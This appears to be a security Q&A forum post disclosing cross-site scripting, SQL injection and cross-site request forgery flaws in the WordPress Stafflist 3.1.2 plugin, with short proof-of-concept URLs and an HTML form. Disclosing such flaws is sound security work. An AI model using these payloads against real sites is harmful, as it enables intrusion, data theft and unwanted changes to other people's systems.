Techbypass always tries to help you to learn about recent vulnerabilities and exploitations.

Learn and share your security findings and help others to secure their digital assets.

Need any help mail to [email protected]

Multiple vulnerabilities in WordPress Stafflist 3.1.2

0 votes
WordPress Stafflist 3.1.2 Cross Site Scripting Vulnerability

WordPress Stafflist 3.1.2 SQL Injection Vulnerability

WordPress Stafflist 3.1.2 Cross Site Request Forgery Vulnerability
by (271 points)

1 Answer

0 votes

WordPress Stafflist 3.1.2 Cross Site Scripting Vulnerability

 

POC:

http://localhost/wp-admin/admin.php?page=stafflist&remove=1&p=1%27%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E

WordPress Stafflist 3.1.2 SQL Injection Vulnerability

POC:

http://localhost/wp-admin/admin.php?page=stafflist&search=[SQLI]

WordPress Stafflist 3.1.2 Cross Site Request Forgery Vulnerability

POC:

<html>

  <body>

    <form action="http://localhost/wp-admin/admin.php">

      <input type="hidden" name="page" value="stafflist" />

      <input type="hidden" name="remove" value="1" />

      <input type="hidden" name="p" value="1" />

      <input type="hidden" name="s" value="1" />

      <input type="submit" value="Submit request" />

    </form>

  </body>

</html>

by (271 points)
 | Snow Theme by Q2A Market
Powered by Question2Answer
...